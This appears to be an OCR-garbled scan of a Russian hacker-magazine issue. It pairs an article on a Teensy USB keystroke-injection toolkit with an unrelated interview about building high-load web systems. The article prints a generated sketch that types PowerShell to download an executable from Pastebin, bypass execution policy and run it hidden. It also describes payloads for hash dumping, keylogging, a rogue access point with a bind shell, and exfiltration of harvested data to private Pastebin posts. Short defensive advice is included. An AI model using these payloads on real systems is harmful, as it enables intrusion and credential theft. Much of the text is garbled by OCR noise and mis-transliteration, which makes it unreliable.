6. Узнать, какие фокусы можетвыкинуть командная строка, когда 
Теепзу будет передавать команды (эмулировать ввод с клавиату- 
ры) на машинужертвы. 

7 . Постараться бытькакможно незаметней на компьютережертвы. 

8. Протестироватьпэйлоад и сделатьокончательный скетч. 

9 . Скомпилироватьскетч изалитьнаТеепзу. 

10. Присоединить девайс к машине жертвы или сделать так, чтобы она 
сделала это сама (например, с помощью социальной инженерии). 

11 . Получить результат:). 

Следующие несколько строк могут выглядеть как самореклама 
;). Каиіііуа автоматизирует шаги с первого по восьмой. Другими 
словами, с использованием тулкита исследователю достаточно: 

1. Выбрать через консольное меню Каиіііуа готовую боевую нагрузку 
и указать опции — в результате будет сгенерирован готовый скетч 
(*.іпо или *.рсІе файл). 

2 . Залитьскетч на платуТеепзу. 

3. П рисоед и нить девайс к машине-жертве. 

4 . Наслаждаться победой! 

В настоящий момент тулкит содержит в себе пэйлоады для 
ѴѴіпсІоѵѵз 7 и І_іпих (протестирован на ІІЬипІи 11.4). Чтобы не быть 
голословным, предлагаю изучить некоторые из них и посмотреть, 
как они работают, если на машине жертвы используется ѴѴіпсІоѵѵз 7. 



ѴѴАКЫШС 



ЕСТЬ ЛИ СПОСОБ ЗАЩИТИТЬСЯ? 



Я вижу два основных способа защиты от подобных атак 
на ѴѴіпсіоѵѵз-системах: 

1. Запретить установку съемных устройств — это можно 
сделать с помощью групповой политики безопасности 
(дресШ.тзс) как для локальной машины, так и для рабочих 
станций в домене. Если перейти в «Административные 
шаблоны -> Система -> Установка устройства -> 
Ограничения на установку устройств», то ты увидишь 
различные настройки для ограничения установки 
устройств. Я бы рекомендовал включить опцию «Запретить 
установку съемных устройств», после этого ни одно 
устройство подключить к системе будет уже нельзя. Кроме 
того, запрещено будет и обновление драйверов для уже 
установленных устройств. Установить новое устройство 
сможеттолько администратор, да и то только после 



активации опции «Разрешить администраторам заменять 
политики ограничения установки устройств». Имей 
в виду: если речь идет об организации, то это непременно 
обернется кошмаром для пользователей, которые, 
не обнаружив привычный РІид'п'РІау, сразу же замучают 
админа просьбами посмотреть их компьютер. А что делать? 

2. Поступить радикально и запретить физический 

доступ к ІІ5В-портам. К сожалению, чаще всего это не 
представляется возможным — в большой компании всегда 
останется лазейка. Некоторые производители материнских 
платзаявляют, что их защитные решения умеют 
блокировать подобные зловредные устройства (в том числе 
собранные на базе Теепзу). Но я бы рекомендовал не сильно 
доверять подобным заявлениям: проверял я тут одну 
защиту, и она была бесполезна чуть больше чем полностью. 



Информация 
представлена 
исключительно 
в образовательных 
целях. Любое ее 
использование 
в неправомерных 
целях может 
караться по всей 
строгости закона 
РФ (статьи 272 
и 273 Уголовного 
кодекса). Ни автор, 
ни редакция 
в этом случае 
ответственности 
не несут. Думай 
головой. 
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Примеры использования 



РауІоасІ: скачать и выполнить 



Как я уже говорил, боевая нагрузка выбирается через консольное 
меню Каиіііуа. Один из простых пэйлоадов — йоѵѵпіоасі апб Ехесиіе, 
который загружает файл из интернета и запускает его на целе- 
вой системе. Естественно, при создании программы для микро- 
контроллера необходимо указать, откуда этот файл нужно взять. 
Интересно, что для хостинга бинарника предлагается разместить 
его на сервисе РазІеЬіп.сот, предварительно обработав его для 
хранения в текстовом виде, а для соответствующей конвертации 
пригодится специальный скрипт ехеіоіехі.рзі, который лежит 
в папке КаиЫуа/ехІгаз. В момент выполнения на машине-жертве 
программа скачивает текстовый файл, преобразует его обратно 
в исполняемый ехе'шник и выполняет его в фоновом режиме. Это 
может быть ѵѵіпсіоѵѵз геѵегзе теіегргеіег (по сути, реверс-шелл): 
если подключить девайс с таким скетчем к исследуемому ком- 
пьютеру, то пентестер очень скоро получит теіегргеіег-сессию. 
Причем нагрузка умеет обходить ехесиііоп роіісу и не отображает 
никаких окон на целевом компьютере. 

Интересно рассмотреть, что все-таки генерирует КаиЫуа. 
Приведу ниже скрипт, поясняя важные моменты небольшими 
комментариями: 

ѵоісі зеІгирО { 
гіе1ау(5&ёв) ; 

// Задержка в 5 секунд необходима, чтобы Ыіпсіоіл/з 7 
// подготовилась для работы с устройством 



гипСстсІ /Т:Ѳ1 /К \"(ЭесЬо о-Р-Р && ітюсіе соп:СОІ_5=15 
1_ІІ\ІЕ5=1 && -Еі-ЕІе Іпз1:а11іп§ РгіуегзѴ' " ) ; 

// Открываем окно консоли очень маленького размера 
// с заголовком Іпзііаіііп^ Ргіѵегз 



сІеІау(ЗѲѲѲ) ; 



КеуЬоагсІ . ргігѵЕІпГ'есІіо &л/еЬс1іегтЕ = ІМеіл/-ОЬіес1: 
5ѵз1:ет.ІМе1:.1лІеЬС1іеп1: > %1:етр%\\сІоып1оасІ . рзі" ); 
// Создаем объект класса ІлІеЬСІіегѵЕ 



КеуЬоагсІ. ргіггЕ1п("есЬо $ип1 = \"Ы :1:р: //ра5І:еЬіп.сот/ 
гам. рЬр?1=1\1бВсИ1р9\" >> %Еетр%\\сІомп1оасІ . рзі" ); 

// РазІіеЬіп ЦКІ. в гам -форма те. который был передан 



ія ріи.ішін» 

1 1 цщщлг-и иш 2#і' »и | Сипч моче | XI ѵ I л» | № I 1 ВІІ1 Г Ч -ТІ 
іші ! пиі і Ікміаш' і шля і пиши і «ічмВшлі 

I. . 

-Л.1ЛІ.ІІ-ЛП *- V» ШШШМЫШРШІІН ІІ№ѴЙ№№ИІМ«<ІНЧ| №і 1 1 
ЩшШЦі ИіМЛЦіИЦіТЛіГіМііЛі ' Г 

4«І адг1Г*:М№-адмИМЛЧ*-| : 

і#к і цц і ры-міій).*іі^ігііыміщійіні 1 ■ 

ЕпІЪІі. IV и I ЛФ+Н I Я-ГМНгіИ'Ѵ ІШ^іЙіМІІ^ІІПИРІП'ІМ . < 

іиі і 4 .і |*г — |Г| -- -■ і 

шімн: імѵ. нм«и»и«нн] (ніінміпіь. ^лшічиітк^-тікгм 

ТШГ4 і 

ІШ ШіШШШМІмІІІНІЙіІІІЬ 

«Ь . І«І. ^ІШТ(0т’іММ)1«№4і 



После подключения устройства, хеши паролей были загружены на РазІеЬіп.сот 



// в качестве опции Каіиііѵа 



КеѵЬоагсІ. ргігтЕ1п( "есЬо [5~Егіп^]$Ьех = $меЬС1іеггЕ. 

Роып1оасІ$1:гіп^($ип1’) >> %~Еетр%\\сІомп1оасІ . рзі" ); 
// Загружаем текст в Ьех-формате 



КеуЬоагсІ. ргігѵЕ1п("есЬо_[Ву1:е[]] $1:етр^ $Ьех -зрііі: 

' ' >> %-Еетр%\\сІомп1оасІ . рзі" ) ; 

// Переводим Ьех в ЬуЕез 



Кеу Ь о агсі. р гіггЕІпГ'есЬо [Бузіет.ІО. Еііе] : :ЫггЕеА11ВуЕез( 
\"%ТЕМР%\\раѵ1оасІ.ехе\" . $~Еетр) >> 

%1:етр%\\сІомп1оасІ . рзі" ) ; 

// Записываем полученные байты в ехе-файл 



КеуЬоагсІ. ргіггЕІпГ'есЬо зііагіі-ргосезз -попемміпсіом 
\"%ТЕМР%\\рау1оасІ.ехе\" >> %1:етр%\\сІомп1оасІ . рзі" ); 
// Незаметно выполняем рауІоасІ. ехе 



сІе1ау(2Ѳ00) ; 



КеѵЬоагсІ. ргіггЕІпГ'есЬо 5е1= оБЬеІІ = СгеаІгеОЬіесІіГ 
\"Ы5сгір-Е.5Ье11\") > %1:етр%\\сІомп1оасІ . ѵЬз"') ; 



КеуЬоагсІ . рпігѵЕ1п( "есЬо оБЬеІІ . Кип(\"ромегзЬе11 . ехе 
-ЕхесиііопРоІісу Вуразз -поІ_о§о -соттапсі 
%1:етр%\\сIомп1оасI.р51\" , ) ,0.1:гие >> 

%і ет р%\\с!о м п 1 о а сі . ѵ Ь з " ) ; 

// Выполняем РомегБЬеІІ-скрипт из ѵЬз. который 
// обходит ехесиііоп роіісу и не отображает никаких 
// окон на компьютере-жертве 



сІе!ау(1000); 



КеуЬоагсІ. ргіпІіІпГ'мзсгірІ: %1:етр%\\сІомп1оасІ . ѵЬз") ; 



сІе!ау(3000); 



КеуЬоагсІ . ргігѵЕ1п( "ехі'Е") ; 

// Закрываем окно терминала 



урігіі 1оорП{ 

// Іоор-фѵнкция необходима в скетче 

} 



ѵоісі г ип( сЬаг * 5отеСоттапс1Н 

КеѵЬоагсІ. зеі тос!ібег(МОРІВІЕККЕУ _КІ6НТ_6Ш) ; 
// Эмулируем нажатие клавиши ілііпсіомз 



КеуЬоагсІ . зе1:_кеу1(КЕУ_К) ; 

// Эмулируем нажатие клавиши <К> 



КеуЬоагсІ . зепсІ_пом( ) ; 

// Посылаем комбинацию клавиш <ЫіпсІом5>+<К> . 
// которая открывает окно "Выполнить" 



сІе1 аѵ(1 5Ѳ0 ) ; 

КеуЬоагсІ . зеі:_тос1ібег(0) ; 

// Эмулируем отпускание клавиши <ЫіпсІом5> 



КеуЬоагсІ . зеі:_кеу1(0); 
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Запрещаем установку внешних устройств для предотвращения атак через ЦЕВ-устройства 

// Эму лируем отпускан и е клавиши <К> 



КеѵЬоагсІ . зепсІпоіл/О ; 

// Отпускаем <1лііпсіоы5> и <К> 



КеуЬоагсІ . ргіп1:(5отеСоттапсІ) ; 

// Вводим переданный аргумент ЗотеСоттапсІ 

// в окн е "В ыполнить" 

КеѵЬоагсІ. 5е^_кеу1(КЕУ_ЕІ\ІТЕКУ. 



КеуЬоагсІ . зепс1_пом( ) ; 



КеуЬоагсІ . 5еі_кеу1(0) ; 



КеуЬоагсІ . зепсІ_пом( ) ; 

ь_ 

Еще раз поясню: этот сгенерированный скрипт сразу готов для 
загрузки на Теепзу через среду разработки Агсішпо Оеѵеіортепі 
ЕпѵігоптепЕ 



РауІоасІ: сдампить хеши паролей 



Другой пэйлоад может быть использован для дампа хешей паролей 
с ѴѴіпсІоѵѵз 7 машины. Для того чтобы его применить, исследова- 
телю необходимо предварительно загрузить скрипт роѵѵегбитр 
теіегргеіег из метасплойта на РазІеЬіп, откуда он будет впослед- 
ствии загружен на жертву. Как известно, этот скрипт работает 
только с привилегиями 5У5ТЕМ, которые можно получить, если 
добавить задание в стандартный планировщик задач. Однако этот 
старый добрый трюк сработает только из-под аккаунта админи- 
стратора. Чтобы передать полученные данные, скетч опять же ис- 
пользует сервис РазІеЬіп, но не раскрывает хеши для всех подряд 
— вместо этого он публикует их в виде приватного поста (недо- 
ступен для посторонних). Правда, для этого предварительно нужно 
зарегистрироваться в сервисе и получить свой ключ разработчика 
(арі беѵеіорег кеу), который скетч будет использовать для публи- 
кации данных. Логин/пароль и ключ для РазІеЬіп, а также имя 
задачи планировщика — все это, само собой, запросит КаиЫуа при 
создании программы для Теепзу. Если залить полученный скетч 
и вставить в компьютер пользователя, который работает с правами 
администратора, то на РазІеЬіп.сот очень скоро окажутся хеши 
пользовательских паролей, которые часто брутятся. 



РауІоасІ: кейлоггер 



Есть среди боевых нагрузок и кейлоггер, представляющий собой 
РоѵѵегЗЬеІІ-скрипт, который сохраняет перехваченные нажатия 
клавиш в приватный пост на РазІеЬіп. Публикация осуществля- 
ется через определенный промежуток времени. Правда, в своем 
непонятном формате. Чтобы перевести данные в понятный вид, 
необходимо использовать скрипт рагзекеуз.рзі, который лежит 
в папке Каиіііуа/ехігаз. Для успешной работы скрипта все данные 
с РазІеЬіп должны быть сохранены в файле сЫа.М. По заверше- 
нии работы он создаст файл І_оддесІ_кеу5.М, содержащий данные 
о нажатых клавишах в читабельном виде. Такой простой кейлоггер 



способен сохранять данные, вводимые в веб-формах и текстовых 
полях приложений. 



РауІоасІ: создание фейковой точки доступа 



Этот необычный пэйлоад использует штатные возможности 
ѴѴіпсІоѵѵз 7 по созданию хотспота и поднимает точку доступа на 
машине-жертве, запуская теіегргеіег ЬіпсІ зЬеІІ. Соответственно, 
в случае успеха пентестер может подключиться к созданной бес- 
проводной сети и добраться до шелла (этот сценарий, кстати, толь- 
ко выглядит экзотическим, но на деле может быть очень эффекти- 
вен). Шелл запускается в оперативной памяти и поэтому незаметен 
(поблагодарим за него Мэта с ехріоіі-топсіау.сот). 

Чтобы создать программу для Теепзу, исследователю необхо- 
димо сначала сгенерировать ЬіпсІ теіегргеіег пэйлоад, используя 
команды из файла ех*газ\рауІоасІдепТхІ, и затем сгенерирован- 
ную нагрузку скопировать в файл згс\годие_арТхЕ При создании 
программы Каиіііуа запросит 55Ю для точки доступа, ключ для 
подключения к беспроводной сети, а также порт (например, 

4444), на котором будут приниматься подключения. Если нагрузка 
выполнится успешно и беспроводная сеть поднимется, то, под- 
ключившись к ней, можно зайти в настройки и посмотреть шлюз 
по умолчанию — это и есть адрес целевого компьютера. Исследо- 
ватель может подключиться к порту 4444, используя тзі" Іізіепег, 
и — бинго! — получить теіегргеіег-сессию. Ты можешь немного 
удивиться, ведь по идее встроенный брандмауэр ѴѴіпсІоѵѵз должен 
был заблокировать подключение. Но если ты взглянешь на исход- 
ники сгенерированного скетча, то увидишь, что Каиіііуа добавил 
свой пэйлоад в список исключений стандартного файрвола винды. 



РауІоасІ: сбор информации 



В наборе тулкита есть пэйлоад и для сбора ценной информации. 

В стандартной вариации программа с помощью специального 
РоѵѵегВЬеІІ-скрипта и реестра извлекает список активных поль- 
зователей, РоѵѵегБЬеІІ-окружение, доверенные хосты РиТТѴ, со- 
храненные сессии РиТТѴ, список расшаренных ресурсов машины, 
переменные окружения, список установленных приложений, до- 
менное имя, содержимое Ьозіз-файла, список запущенных служб, 
политику учетных записей, локальных пользователей, локальные 
группы и информацию о ѴѴІ_АІЧ. Полученные данные, как обычно, 
сохраняются на РазІеЬіп в приватном посте. 



Пример из жизни 



Вопрос, который мне постоянно задают: «Действительно ли все 
бывает полезно в настоящих тестах на проникновение?» Да. Я бы 
хотел поделиться историей одного пентеста. Я выполнял тест на 
проникновение для крупной индийской финансовой компании. Это 
был тесттипа «черный ящик», то есть я был поставлен в условия 
настоящего злоумышленника без доступа к чему-либо. Серверы 
компании, доступные из интернета, были надежно защищены, 
и придраться там было не к чему. Что делать, непонятно. Тогда я 
пошел в их офис и сказал охранникам на входе, что я нашел не- 
сколько мышек и флешек, которые выпали у какого-то работника 
из сумки. Все устройства были протроянены Теепзу и содержали 
различные пэйлоады. Через полчаса я получил первый шелл 
(скорее всего, это был компьютер в комнате охраны). К концу дня 
у меня уже были привилегии локального администратора на мно- 
гих компьютерах — судя по всему, охранники передали устройства 
в ІТ-отдел. Из протрояненных устройств 90% процентов были 
подключены хотя бы к одной системе, а 70% успешно выполнили 
заложенный в них пэйлоад. Клиент, вбухавший в безопасность 
кучу денег, был сильно удивлен и впечатлен подобным спосо- 
бом проникновения. Теперь эта брешь у них прикрыта. Что я хочу 
сказать? До тех пор пока операционные системы и защитные 
механизмы доверяют НЮ-устройствам, использовать их в качестве 
вектора атаки не будет проблемой для злоумышленников. При этом 
подобные способы атаки до сих пор многими специалистами по 
безопасности не рассматриваются всерьез. А зря. ПС 
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ВЫСОКИЕ 

НАГРУЗКИ 

ИНТЕРВЬЮ С РАЗРАБОТЧИКОМ 

НІ6НША0-СИСТЕМ 



ОЛЕГ БУНИН 




Разработку высоконагружен- 
ных систем считают высшим 
пилотажем. Людей, которые 
обладаюттайными знаниями 
в этой области, — десятки на 
всю Россию. Мы поговорили 
с одним из самых известных 
ЫдЫоасі-специалистов — Оле- 
гом Буниным. Начав свой путь 
программистом в РатЫег'е, 
он со временем переключил- 
ся на разработку и консалтинг 
высоконагруженных проектов. 
В числе первых клиентов его 
компании — один из самых по- 
сещаемых проектов Рунета со- 
циальная сеть «ВКонтакте». 



КАРЬЕРА 



Образование у меня техническое, но в рабо- 
те оно пригодилось очень мало. Начиная со 
2-3-го курса института я уже работал в ночной 
техподдержке «Зенон Н.С.П.» — это был тогда 
первый провайдер. В это же время я стал 
делать первые веб-проекты. 

Карьера фактически началась в РатЫег'е, 
куда я пришел после института. Там была 
огромная концентрация людей, которые знали, 
как правильно работать. Например, Игорь 
Сысоев, к которому мы приходили учиться. 
Просто приходили, садились у него за спиной 
и смотрели, что он делает. 

Два года я работал без выходных. Приез- 
жал по субботам и воскресеньям и занимался 
тем, чего мне не поручали. Хотел зарекомен- 
довать себя и поэтому переписывал какие-то 
блоки и целые системы. Я был одним из тех, 
кто разработал простейшую и примитивную 
(сейчас мне вообще за нее стыдно, и, тем не 
менее, она работала) систему по связыванию 
контента с разных проектов друг с другом. 
Через какое-то время меня заметили и ска- 
зали: «Раз ты так стараешься, давай, пробуй 
большее». Так появился отдел веб-разработок, 
которому поручили интерактивное направле- 
ние. Получился классический путь: сначала 
нужно показать, что ты что-то можешь, и потом 
тебе позволят это сделать. 

Опыт веб-разработки со временем пре- 
вратился в бизнес. В 2008 году я основал ком- 
панию «Онтико», которая специализируется 
на консультировании по высоконагруженным 
системам и на их разработке. 



ПРО «ВКОНТАКТЕ» 



«ВКонтакте» пришли к нам через 3-4 месяца 
после своего старта. Тогда о них толком никто 
не знал. Они запустились в ноябре 2006-го, 
и уже в декабре-январе мы ездили их консуль- 
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тировать. Нагрузка у них тогда была относи- 
тельно небольшая: количество пользователей 
еще измерялось тысячами. 

Мы рассказывали им самые простые вещи. 
Как правильно организовать работу. Как 
правильно подойти к разработке кода с тем, 
чтобы потом, когда придут настоящие высокие 
нагрузки, у них все продолжало работать. Мы 
объясняли им, что нужно разделять все на 
слои, что запросы к 5(ЗІ_ базе данных должны 
идти из одного места, — короче говоря, самые 
базовые вещи. Они просто фантастические 
ребята и очень быстро всему научились. 

Меня часто спрашивают — украден ли код 
«ВКонтакте»? Я однозначно знаю, что не укра- 
ден. Они разрабатывали и делали все сами. 
Нужно сказать, что поначалу у них был очень 
страшненький код: такого просто не могло 
быть у РасеЬоок :). Но при этом он работал. 



О РАЗРАБОТЧИКАХ 
ВЫСОКОНАГРУЖЕННЫХ СИСТЕМ 



Главное отличие простого веб-программиста 
от разработчика высоконагруженной системы 

заключается в том, что последний знает, как 
работает вся система, и понимает, что проис- 
ходит внутри. 



Для обычного разработчика сервер — это 
и есть сервер. Он загрузил туда РНР-скрипт — 
тот запустился и выполнился. В свою очередь, 
разработчик высоконагруженных систем пред- 
ставляет, как все это происходит в деталях. 

Вот пошел запрос от браузера: куда он пришел, 
как это попало на сетевую карту, как обра- 
боталось ОС, как попало в пдіпх, как пошло 
дальше, как обработалось в базе данных и так 
далее. В каком-то смысле, он понимает всю 
физику процесса. 

Когда я набираю людей на работу, я всегда 
прошу рассказать, сколько стадий запро- 
са есть в Арасііе. На этот вопрос не отвечает 
никто, потому что все обычно работают только 
на одной из стадий. И это большое упущение. 

К примеру, есть такие стадии, которые обра- 
батываются уже после того, как пользователю 
отдан ответ. В «Рамблере» мы это активно экс- 
плуатировали. Когда пользователю уже отдан 
ответ, сервер может продолжать обрабатывать 
запрос: на этом этапе можно реализовать об- 
работку логов, подсчет статистики и чего угод- 
но еще, что не требует вычисления в реальном 
времени. Перехватывать запрос можно и на 
более ранней стадии. К тому моменту, когда 
РНР-скрипт запустится, многое уже можно вы- 



полнить и обработать. Понимание таких вещей 
и есть сдвиг парадигмы в сторону высокона- 
груженных систем. 

Высоким нагрузкам нужно учиться там, 
где они есть. Большинство компаний, которые 
сейчас занимаются ЫдЫоасІ, и люди, которые 
обладают этим «тайным знанием», в боль- 
шинстве своем прошли через школу трех 
кнопок — РатЫег, Яндекс, МаіІ.ги. Поработав 
там, человек приобретает необходимый опыт. 

В моем случае это был «Рамблер». Там я дошел 
от программиста до руководителя отдела раз- 
работки. 



ПРО РАЗРАБОТКУ! 
НЮНЮАО-СИСТЕМ 



Любой высоконагруженный проект, как 
правило, переписывается много-много раз. То 

есть сначала пишется какой-то код, который 
начинает работать. Потом, по мере роста на- 
грузки, смотрим, где он перестает работать, 
какие места становятся узкими. Тогда проект 
переписывается по-другому, уже с учетом но- 
вых реалий: добавляется кеширование, другая 
база данных, другой индекс или все структури- 
руется иначе. Такое происходит многократно, 
и это абсолютно нормальный путь развития 
любого крупного проекта. 

«ВКонтакте» — прекрасный пример того, 
как нужно строить высоконагруженные про- 
екты и стартапы. Парни не стали сразу писать 
сайт, ориентированный на сто миллионов 
пользователей. Пока у них не было большого 
трафика, они делали маленький проектик. Это 
сейчас «ВКонтакте» строит себе дата-центры 
и прокладывает каналы, но сначала речь шла 
об одном-двух серверах. 

Высоконагруженный проект нельзя напи- 
сать с нуля, но можно максимально упростить 
себе жизнь, заранее заложив на будущее 
возможность для маневра и масштабирова- 
ния. Тогда вы будете готовы ктому моменту, 
когда пойдет трафик и пойдут люди. Вам не 
нужно сразу делать проект, работающий на ста 
серверах, но нужно сделать все возможное для 
того, чтобы вы смогли максимально опера- 
тивно это реализовать, когда такая необходи- 
мость возникнет. 



ПРО МОДУЛЬНОСТЬ и слоистость 



Первое, о чем стоит подумать, — это код 
и структура кода. Для того чтобы проект 
потенциально мог расти, у вас должен быть 
грамотно написанный код. Крайне важно, 
чтобы он обладал модульной структурой 
и слоистостью. 

Модульность означает, что каждый 
семантический блок оформлен в отдельный 
программный кусок, в отдельный модуль, 
отдельный сервис. Допустим, у вас есть со- 
циальная сеть и в ней — работа с фотография- 
ми. Значит, должен быть модуль для работы 
с ними. Не должно быть так, что закачивание 
фото происходит в одном месте, удаление 
в другом, редактирование в третьем и так 
далее. Структурируйте свой код, с тем чтобы 
потом его было легко поддерживать и легко 
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растить. В огромных проектах количество 
строк кода измеряется сотнями тысяч. Если 
у вас нет определенного порядка, вы с этим не 
разберетесь. 

Слоистость — это почти то же самое, 
что модульность, только в другом разрезе. 

Каждый слой должен отвечать за строго 
определенный набор функций. Например, 
слой представления оформляетуже получен- 
ные и обработанные данные, предоставляя 
их пользователю. Следующий слой — слой 
бизнес-логики. Это программный слой, 
который отвечаетза преобразование данных: 
берем информацию в таком формате, что-то 
добавляем, показываем и передаем даль- 
ше в таком-то формате. Дальше идет слой 
кеширования. Далее слой хранения — слой 
работы с базой данных. Здесь, в одном месте, 
аккумулируется вся работа с базой данных. 
Опять же: не должно быть такого, что 5 О Ь код 
у вас разбросан везде по проекту. 

На мои слова многие ехидно ответят: «О, 
Капитан Очевидность пришел». Но практика 
показывает, что у большинства проектов нет 
даже этого. Но именно с этого нужно начинать, 
без этого просто дальше никуда. 

Приведу небольшой пример. Как проис- 
ходит обработка запроса? Приходит запрос. 
Ядро любого движка определяет — пришел 
такой-то запрос, нужно вызвать такой-то 
модуль. Первое, что делает модуль, — гото- 
вит данные перед показом. Например, это 
показ фотографий. На уровне бизнес-логики 
вычисляется, какая конкретно нужна фото- 
графия. Условно: нужна фотография № 13 и ее 
нужно показать в расширенном варианте. 
Нужно достать описание фотографии из базы 
данных. Передаем запрос на слой ниже — это 
может быть слой кеширования: «Отдай мне 
объект такой-то с идентификатором таким-то». 
Слой кеширования проверяет у себя, есть ли 
данные в кеше, и, если их там нет, передает 
запрос еще на слой ниже, вызывая следую- 
щую процедуру, которая уже непосредствен- 
но общается с базой данных. Запрос между 
слоями унифицированный: «Дай объект номер 
такой-то». В чем заключается слоистость? 

В нашем примере слой кеширования не знает, 
где хранятся данные, — об этом знаеттолько 
слой базы данных. Слой бизнес-логики, в свою 
очередь, знает, что и как кешируется. Быть 
может, вот эти конкретные объекты вообще не 
кешируются — но его это не касается. 

Такое горизонтальное разделение функ- 
ций позволяет вам потом взять и, например, 
один слой поменять. Ситуация из жизни. Вы 
запускаете небольшой проект, где кеширо- 
вание просто не нужно. У вас есть прослойка, 
которая отвечает за кеш, но она ничего толком 
не делает, просто проксирует запрос («Дай 
объекттипа фото с идентификатором 13») 
дальше. Сначала все будет и работать и так. Но 
когда нагрузка вырастет, то в этот конкрет- 
ный кусочек вы легко добавляете кеш. Чтобы 
перед отправкой запроса в базу данных была 
проверка кеша. Как только вы это сделали, 
возможности вашего проекта выдерживать 



нагрузки увеличились. Вот об этом я говорю, 
когда прошу подготовить все необходимое для 
дальнейшего роста. Вы будете видеть, где кон- 
кретно у вас узкие места, где нужно кеширова- 
ние, и будете вставлять его именно туда. 

Дальше идет запрос к базе данных, она 
уже каким-то образом работает. Что это за 
база данных — Му50І_ или какая-то другая 
база, знаеттолько конкретно этот слой. У нее 
задача: получи запрос и отдай ответ выше. 

Для слоя базы данных не имеет значения, кто 
в данный момент его спрашивает — страничка 
фотографий или, к примеру, мобильное при- 
ложение, которое эти фотографии показывает. 
Он просто работает на своем уровне: пришел 
запрос «отдать такой-то объект» — слой его 
выполнил. 

Представим, что база данных из нашего 
примера растет и уже перестала влезать на 
одну машину. Тогда вы решаете разбить фото- 
графии на две машины. Фото от А до В будут 
лежать здесь, а фото с В до С там. На двух раз- 
ных машинах. Если вы все структурировали, 
вам не придется перелопачивать весь код, не 
нужно будет лезть в бизнес-логику. Вы просто 
в одной-единственной процедуре, которая 
отвечает за поднятие фотографий, вставляете 
простейший балансировщик. На начальном 
этапе, возможно, будет достаточно банального 
\і: если это такая картинка — иди туда, если 
такая — вот сюда. Вставляете, запускаете — 
и оно работает. Все остальное остается без 
изменений. Пользователь вообще ничего не 
почувствует. Весь остальной код тоже ничего 
не почувствует. Никто не узнает, что вы про- 
извели реальное масштабирование, разделив 
(или, как это называется, расшардировав) 
фотографии на две машины. 



ПРО РАБОТУ С БАЗАМИ ДАННЫХ 



Изначально подходите к высоконагружен- 
ному проекту так: это должны быть простые, 
легкие, быстрые запросы к базе данных. 

Маленькие, быстро отрабатываемые. И потом 
логика серверной части по переработке. 

Необходимо минимизировать связность 
кода и использование сложных запросов сра- 
зу к нескольким таблицам. Внешние ключи, 
запросы с ЭОІІМ'ами очень удобны для раз- 
работки, но они ставят крест на дальнейшем 
масштабировании. Минусы ЭОІІМ'ов хорошо 
проиллюстрирует простой пример. Я хочу по- 
казать не просто всех пользователей, а только 
тех, у которых есть хотя бы одно сообщение. 

Я делаю простой ЭОІІМ, связываю две таблицы 
и одним запросом вытаскиваю список нужных 



юзеров. Вот такого делать как раз нельзя, по- 
тому что потом вы замучаетесь их разделять. 
Когда вы захотите, чтобы эта таблица поль- 
зователей лежала в одной базе данных, а вот 
эта в другой, третья была разделена одним 
способом, а четвертая еще каким-то другим, 
то как будет работать ЭОІІМ, который требует, 
чтобы все это были единые сущности? Он не 
будет работать никак. 

Нормализация — не более чем красивая 
концепция, которая не работает в высокона- 
груженных системах. Если у вас что-то будет 
денормализировано — ничего страшного. 
Высоконагруженные системы — это история 
про многократное дублирование данных, кода 
и всего остального. Всё в угоду скорости. 

Прикинем масштабы «ВКонтакте»: они не- 
давно отрапортовали — 35 миллионов чело- 
век в день. Пользователь здесь, как и в любых 
других социальных сетях, просматривает по 
50-100 страниц — он там практически живет. 
Простая арифметика: 35 миллионов на 50 — 
примерно полтора миллиарда. Получается, эти 
35 миллионов человек сгенерировали полтора 
миллиарда запросов к страницам. В час 
пик — эмпирически делим на 10, получаем 
150 миллионов. Делим на 3600 — получается 
около 40 000 запросов в секунду. Фантастиче- 
ская цифра! И это интеллектуальные запросы 
к страницам, для выполнения которых нужно 
подумать, что-то обработать и что-то вывести. 
Когда идеттакой поток сообщений, вам абсо- 
лютно все равно, что данные хранятся в десяти 
экземплярах. Вам просто нужно максимально 
быстро их отдать. Это колоссальная по слож- 
ности задача. 

Другой пример. Представим, что Марк 
Цукерберг написал сообщение и опубликовал 
на своей стене. У него 11 миллионов под- 
писчиков. Как ты думаешь, дорогой читатель, 
сколько копий данного сообщения хранится 
внутри РасеЬоок? Скорее всего, 11 миллионов, 
а может, даже и больше! До фига, но ничего 
страшного в этом нет, потому что иначе это не 
заработает. Если будет только одно место, где 
хранится сообщение, то каждый из этой армии 
пользователей при заходе на свою страницу 
будет к нему обращаться. Это будет узкое ме- 
сто в системе, которое быстро откажет. 



МАСШТАБИРОВАНИЕ 



Первое, чего потребует от вас высоконагру- 
женный проект, — ввести трехзвенную струк- 
туру. Общий ее смысл заключается в сле- 
дующем. Есть фронтенд — это легкий сервер, 
который отдает статику, картинки, Э5-скрипты 



МЕНЯ ЧАСТО СПРАШИВАЮТ — УКРАДЕН ЛИ 
КОД «ВКОНТАКТЕ»? Я ОДНОЗНАЧНО ЗНАЮ, 
ЧТО НЕ УКРАДЕН. ОНИ РАЗРАБАТЫВАЛИ 
И ДЕЛАЛИ ВСЕ САМИ 
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и держит первый удар пользователя. Есть 
бекенд, на котором выполняются сложные 
вычисления, — это как раз ваша страничка, 
например на РНР или чем-то другом. И есть си- 
стема хранения, например БД. Всего три звена. 

Казалось бы, зачем вводить три зве- 
на — ведь существуют накладные расходы 
на передачу информации между ними (так 
называемые оверхеды). Одно дело, когда 
у вас одна страничка и всё внутри, а здесь 
получаются целых три звена! Одно обра- 
батывает данные и передает свои вопросы 
дальше, другое делает свои вычисления 
и так далее. Вы удивитесь, когда рассмотрите 
страницу РасеЬоок: там задействовано такое 
количество серверов... Запрос вам отдает не 
один сервер — его отдают десятки. Картинка 
достается оттуда, один блок отсюда, другой 
блок еще из какого-то места и так далее. 

То же самое происходит, когда вы вбиваете 
запрос в «Яндексе» и нажимаете «Поиск» 

— его одновременно обрабатывают десят- 
ки серверов. Каждый ищетзапрос в своем 
маленьком кусочке индекса. Потом все это 
сливается в единое место, там обрабатывает- 
ся, кешируется, проверяется, потом оформля- 
ется. То есть все это проходит через огромное 
количество серверов. 

Накладные расходы возникают, но они не- 
обходимы. Если не пойти на эти дополнитель- 
ные оверхеды, когда приходится обрабатывать 
запрос по нескольку раз или разбивать его на 
части, вы не сможете отмасштабироваться. Так 
вы разбили запрос на части и каждую часть 
можете поручить своему отдельному серверу. 
Это общий принцип: вы вводите некие допол- 
нительные расходы на разбиение, передачу 
и сливание запросов в целое, но это позволяет 
вам свободнее их обрабатывать, используя 
большое количество серверов. 

Перехода на трехзвенную структуру за- 
частую достаточно, чтобы проект выдерживал 
нагрузки в десятки, а то и сотни тысяч пользо- 
вателей в сутки, если все грамотно написано. 

